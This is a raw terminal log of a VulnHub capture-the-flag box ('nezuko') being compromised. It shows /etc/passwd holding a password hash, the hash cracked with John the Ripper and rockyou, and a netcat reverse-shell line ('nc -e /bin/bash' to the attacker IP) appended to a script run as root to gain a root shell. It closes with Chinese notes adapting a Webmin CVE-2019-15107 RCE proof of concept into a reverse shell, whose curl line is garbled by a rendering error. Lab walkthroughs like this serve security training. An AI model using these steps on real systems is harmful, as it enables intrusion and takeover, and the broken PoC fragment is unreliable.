ED25519 key fingerprint is SHA256:2Ru1IBosCTKF6TvCVfZdwFwIaEjQloQOwvpfhwVTi04.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.219.180' (ED25519) to the list of known hosts.
Warning: SSH client configured for wide compatibility by kali-tweaks.
Welcome to Ubuntu 18.04.2 LTS (GNU/Linux 4.18.0-15-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
* Canonical Livepatch is available for installation.
- Reduce system reboots and improve kernel security. Activate at:
https://ubuntu.com/livepatch
404 packages can be updated.
189 updates are security updates.
New release '20.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.
Your Hardware Enablement Stack (HWE) is supported until April 2023.
Last login: Wed Aug 21 01:12:52 2019
nezuko@ubuntu:~$ ls
from_zenitsu nezuko.txt
nezuko@ubuntu:~$ ls
from_zenitsu nezuko.txt
nezuko@ubuntu:~$ pwd
/home/nezuko
nezuko@ubuntu:~$ cd /home
nezuko@ubuntu:/home$ ls
nezuko zenitsu
nezuko@ubuntu:/home$ sudo su zenitsu
[sudo] password for nezuko:
Sorry, try again.
[sudo] password for nezuko:
Sorry, try again.
[sudo] password for nezuko:
sudo: 2 incorrect password attempts
nezuko@ubuntu:/home$ ls
nezuko zenitsu
nezuko@ubuntu:/home$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
uuidd:x:105:111::/run/uuidd:/usr/sbin/nologin
avahi-autoipd:x:106:112:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
cups-pk-helper:x:110:116:user for cups-pk-helper service,,,:/home/cups-pk-helper:/usr/sbin/nologin
speech-dispatcher:x:111:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
whoopsie:x:112:117::/nonexistent:/bin/false
kernoops:x:113:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
saned:x:114:119::/var/lib/saned:/usr/sbin/nologin
pulse:x:115:120:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
avahi:x:116:122:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
colord:x:117:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:118:7:HPLIP system user,,,:/var/run/hplip:/bin/false
geoclue:x:119:124::/var/lib/geoclue:/usr/sbin/nologin
gnome-initial-setup:x:120:65534::/run/gnome-initial-setup/:/bin/false
gdm:x:121:125:Gnome Display Manager:/var/lib/gdm3:/bin/false
nezuko:x:1000:1000:nezuko,,,:/home/nezuko:/bin/bash
zenitsu:$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0:1001:1001:,,,:/home/zenitsu:/bin/bash
sshd:x:122:65534::/run/sshd:/usr/sbin/nologin
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txrt
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ cat "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt
cat: t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0: 没有那个文件或目录
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ echo "$6$LbPWwHSD$69t89j0Podkdd8dk17jNKt6Dl2.QYwSJGIX0cE5nysr6MX23DFvIAwmxEHOjhBj8rBplVa3rqcVDO0001PY9G0" >> zenhash.txt
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john - zenhash.txt
Completing option
--bare-always-valid -- treat bare hashes as valid (Y/N)
--config -c -- use config
--costs -- load salts with(out) cost value Cn (t
--crack-status -- emit a status line whenever a passwor
--device -- set OpenCL device (list using --list=
--dupe-suppression -- suppress all dupes in wordlist (and f
--dupe-suppression -- suppress all dupes in wordlist (and f
--external -- external mode or word filter
--field-separator-char -- use "C" instead of ":" in input and p
--fork -- fork N processes
--format -- use specific format
--groups -- do not load these group only
--help -h -- display help
-i -- specify: -[incremental mode]
--incremental -i
--incremental -i -- incremental mode
--input-encoding --encoding -- input data is non-ascii (eg. UTF-8, I
--internal-codepage -- codepage used in rules/masks
--keep-guessing -- try finding plaintext collisions
--length -- shortcut for --min-len=N --max-len=N
--list -- list capabilities
--log-stderr -- log to screen instead of file
--loopback --loopback -- like --wordlist, but fetch words from
--make-charset -- make a charset file. It will be overw
--markov --markov -- markov mode
--mask -- mask mode using MASK (or default from
--max-candidates -- gracefully exit after this many candi
--max-length -- request a maximum candidate length in
--max-run-time -- gracefully exit after this many secon
--max-run-time -- gracefully exit after this many secon
--mem-file-size -- size threshold for wordlist preload (
--min-length -- request a minimum candidate length in
--mkpc -- request a lower max. keys per crypt
--mkv-stats -- markov stats file (see doc/MARKOV)
--node -- this node's number range out of TOTAL
--no-keep-guessing -- do not try finding plaintext collisio
--no-log -- disables creation and writing to john
--no-mask -- used with --test for alternate benchm
--pipe -- read from pipe/stdin but with rules
--platform -- set OpenCL platform
--pot -- pot file to use
--prince -- PRINCE mode, read words from FILE
--prince-case-permute -- permute case of first letter
--prince-elem-cnt-max -- maximum number of elements per chain
--prince-elem-cnt-min -- minimum number of elements per chain
--prince-keyspace -- just show total keyspace that would b
--prince-limit -- limit number of candidates generated
--prince-loopback -- fetch words from a .pot file
--prince-mmap -- memory-map infile (not available with
--prince-skip -- initial skip
--prince-wl-dist-len --prince-wl-max -- calculate length distribution from wo
--progress-every -- emit a status line every N seconds
--regen-lost-salts -- regenerate lost salts (see doc/OPTION
--regen-lost-salts -- brute force unknown salts
--reject-printable -- reject printable binaries
--restore --restore -- restore an interrupted session
--rules -r -- use rule
--rules-skip-nop -- skip any NOP ":" rules (you already r
--rules-stack -- stacked rules
--salts -- load salts with(out) COUNT (to MAX) h
--save-memory -- Enable memory saving, at LEVEL 1..3
--session --session -- give a new session the NAME
--show=LEFT --show -- show cracked passwords (if =LEFT, the
--single -- use single crack mode
--single-retest-guess -- override config for SingleRetestGuess
--single-seed -- add static seed words for all salts i
--single-wordlist -- short wordlist with static seed words
--skip-self-tests -- skip self tests
--status --status -- print status of a session
--stdout --stdout -- just output candidate passwords
--stress-test -- loop self tests forever
--subformat -- pick a benchmark format for --format=
--subsets -- "subsets" mode (see doc/SUBSETS)
--subsets-max-diff -- Maximum unique characters in subset
--subsets-min-diff -- Minimum unique characters in subset
--subsets-required -- The N first characters of "subsets" c
--test-full -- run more thorough self-tests
--tuning -- tuning options (auto/report/N)
--users -- do not load these users only
--verbosity -- change verbosity (1-5 or 6 for debug,
--wordlist -w
--wordlist -w -- use wordlist
-w
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist = /usr/share/wordlists/rockyou.txt zenhash.txt
stat: =: No such file or directory
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zenhash.txt
Using default input encoding: UTF-8
No password hashes loaded (see FAQ)
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt zenhash.txt
Using default input encoding: UTF-8
Loaded 1 password hash (sha512crypt, crypt(3) $6$ [SHA512 256/256 AVX2 4x])
Cost 1 (iteration count) is 5000 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
meowmeow (?)
1g 0:00:00:00 DONE (2023-01-15 21:27) 1.030g/s 3694p/s 3694c/s 3694C/s asdf1234..fresa
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
┌──(pinginglab㉿pinginglab)-[~/vulnhub/nezuko]
└─$
meowmeow
nezuko@ubuntu:/home$ su zenitsu
Password:
zenitsu@ubuntu:/home$ ls
nezuko zenitsu
zenitsu@ubuntu:/home$ ls
nezuko zenitsu
zenitsu@ubuntu:/home$ id
uid=1001(zenitsu) gid=1001(zenitsu) groups=1001(zenitsu)
zenitsu@ubuntu:/home$ cd zenitsu/
zenitsu@ubuntu:~$ ls
to_nezuko zenitsu.txt
zenitsu@ubuntu:~$ cd to_nezuko/
zenitsu@ubuntu:~/to_nezuko$ ls
send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
zenitsu@ubuntu:~/to_nezuko$ ls -al
total 12
drwxr-xr-x 2 zenitsu root 4096 Ogos 21 2019 .
drwxr-xr-x 4 zenitsu zenitsu 4096 Ogos 21 2019 ..
-rw-r--r-- 1 zenitsu root 150 Ogos 21 2019 send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ echo "nc -e /bin/bash 192.168.219.177 5555" >> send_message_to_nezuko.sh
zenitsu@ubuntu:~/to_nezuko$ cat send_message_to_nezuko.sh
#!/bin/bash
date=$(date '+%d-%m-%Y_%H:%M')
echo "nezuko chan, would you like to go on a date with me? " > /home/nezuko/from_zenitsu/new_message_$date
nc -e /bin/bash 192.168.219.177 5555
zenitsu@ubuntu:~/to_nezuko$
third flag
┌──(pinginglab㉿pinginglab)-[~]
└─$ nc -lnvp 5555
listening on [any] 5555 ...
id
id
id
id
id
id
connect to [192.168.219.177] from (UNKNOWN) [192.168.219.180] 41430
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
uid=0(root) gid=0(root) groups=0(root)
id
uid=0(root) gid=0(root) groups=0(root)
ls
root.txt
snap
cat root.txt
Congratulations on getting the root shell!
Tell me what do you think about this box at my twitter, @yunaranyancat
................. .......................... ........
................ ........................ ........
............... ... . . ........................ ........
. ... .. ............................... ........................ ........
. ........... .................................... ......................... ........
. ... ......... .................,,,,,,,,................. ......................... ........
.. ...... ..............,,,,,,,,,,,,,,,,,,............ ......................... ........
. . .... ...........,,,,,,,,,,,,,,,,,,,,,,,,,,......... ........................ ..... .
. .........,,,,,,,,,,,,,,,,,,,,,,,,,,,,,,........ ...................... .......
. . . .......,,,,,,,,,,,,,,,,,,******,*********,....... ..................... .......
. .....,,,,,,,,,,,,,,***,**********************...... .................. .......
....,,,,,,,,,,***********************************..... ................. .... ..
...,,,,*********************************************..... .................. . .....
....**********,. .,*****************, ,********.... .................. . .....
...******, ,***************************************. *****... .................. .. .
...*** .**************,***********************************,,*,.. .................. ...
..,.,******************.,*****************,..,*****************,. ................. . .
..**************,,,.......***************,.,......,*************. ............... ...
.**********************,,,,*************,,.*********************, ................ .. .
.********** .***.,,************,***. ,.****** .............
****** *(###(/, **/*,,********** ,(#####(* * ..............
,*** ,##########/,, **///*...,##########(,.. .,/ ... ..
***..,..,,,,,,,,,,,,/,*///..,,,*****,,,,*,,.//* .. .... .
//.............//............../* ..... ..
*. /// .((//, ..
,, ///(, ((//. .
*//.*// ... **.///./ ...... //.//..
///,/ .
/*,,/// .
,. .///,,,,//,...,
, ,,.*///*,,//,,, ,
,,.,,/,/ ,.
,/,///*/
*/
.///,,//
.............,//*
///,,,,//
**,,,
.,, , ///.,,,,,.
/,,,, /,,, *..,,/..,,,/
/*,,,,,,,,.,. // ,.,,,,,,,,,/
,//,,,,,,,,,,,,,,, ,/.,,,,,,,,,,,,,,//
*,,,,,,,,,...,,,,,,. ,,,,,,,,..,,,,,,,. .//,
*/*. .,,,,,,,,,,.,,.,,.,,,,,,,,,,,. ,**/***
3ca33b8158d9dee5c35a7d6d793c7fd5
other escape
using:
https://www.bilibili.com/read/cv3530863/
然后改一下poc.sh这个脚本,把脚本里面执行echo '$FLAG’的那一段,改成nc -e /bin/bash attack_ip port就好了,改好之后就是这样的:
echo -n "Testing for RCE (CVE-2019-15107) on $URI: ";
curl -ks KaTeX parse error: Expected 'EOF', got '&' at position 41: … -d 'user=wheel&̲pam=&expired=2&…URI’/session_login.cgi’|grep $FLAG>/dev/null 2>&1
作者:合天网安实验室 https://www.bilibili.com/read/cv3530863/ 出处:bilibili